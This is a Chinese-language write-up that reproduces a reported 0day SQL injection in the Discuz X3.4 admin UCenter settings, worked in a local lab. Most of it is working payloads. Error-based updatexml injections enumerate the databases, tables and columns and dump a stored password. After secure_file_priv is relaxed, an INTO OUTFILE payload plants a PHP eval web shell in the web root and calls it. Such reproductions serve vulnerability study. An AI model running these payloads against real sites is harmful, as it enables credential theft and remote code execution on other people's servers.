圈子某位大佬公佈的0day,拿來刷一刷,漏洞分析請移步大佬文章。
大佬鏈接
0x01 環境準備
1、首先去碼雲下載最新版本的discuz(DiscuzX 3.4 R20191201)。
2、將upaod放置到網站目錄下,訪問安裝目錄安裝即可。
0x02 漏洞復現
點擊站長--UCenter設置
點擊最下面的提交進行抓包
判斷列數
1' order by 1 //返回正確
1' order by 2 //返回錯誤
查詢當前用戶
1' and updatexml(1,concat(0x7e,(SELECT user())),1)-- a
查詢版本
1' and updatexml(1,concat(0x7e,(SELECT version())),1)-- a
查詢數據庫
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)-- a //mysql
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),1)-- a //information_schema
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),1)-- a //performance_schema
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 3,1)),1)-- a //sys
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 4,1)),1)-- a //test
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 5,1)),1)-- a //ultrax
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 6,1)),1)-- a //空
可以發現,共有6個庫
查詢數據表
這裏隨便找了一個庫測試的,test庫只有一個表。
1' and updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='test' limit 0,1)),1)-- a //users
1' and updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.tables where TABLE_SCHEMA='test' limit 1,1)),1)-- a //空
1' and updatexml(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA='mysql')),1)-- a
查詢字段
1' and updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users')),1)-- a
這個沒顯示全
1' and updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 2,1)),1)-- a //user
1' and updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 5,1)),1)-- a //password
爆字段值
1' and updatexml(1,concat(0x7e,(select password from test.users limit 1,1)),1)-- a
成功搞到密碼test123
寫入文件
Payload:
1' into outfile 'c:\\wamp64\\tmp\\1.txt' -- a
emmmm....
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
查看一下secure-file-priv配置
show variables like '%secure%';
secure_file_priv的值爲null,那麼secure_file_priv這裏都有什麼設置呢
- secure_file_priv爲null 表示不允許導入導出
- secure_file_priv指定文件夾時,表示mysql的導入導出只能發生在指定的文件夾
- secure_file_priv沒有設置時,則表示沒有任何限制
修改mysql.ini文件,加入如下語句
secure_file_priv=''
重啓mysql服務
1' union select '<?php eval($_GET[1])?>' into outfile 'C:\\phpstudy_pro\\WWW\\discuz\\1.php' -- a
http://192.168.91.149/discuz/1.php?1=phpinfo();
0x03 結束
吐槽一下,手注真麻煩,還是sqlmap好玩。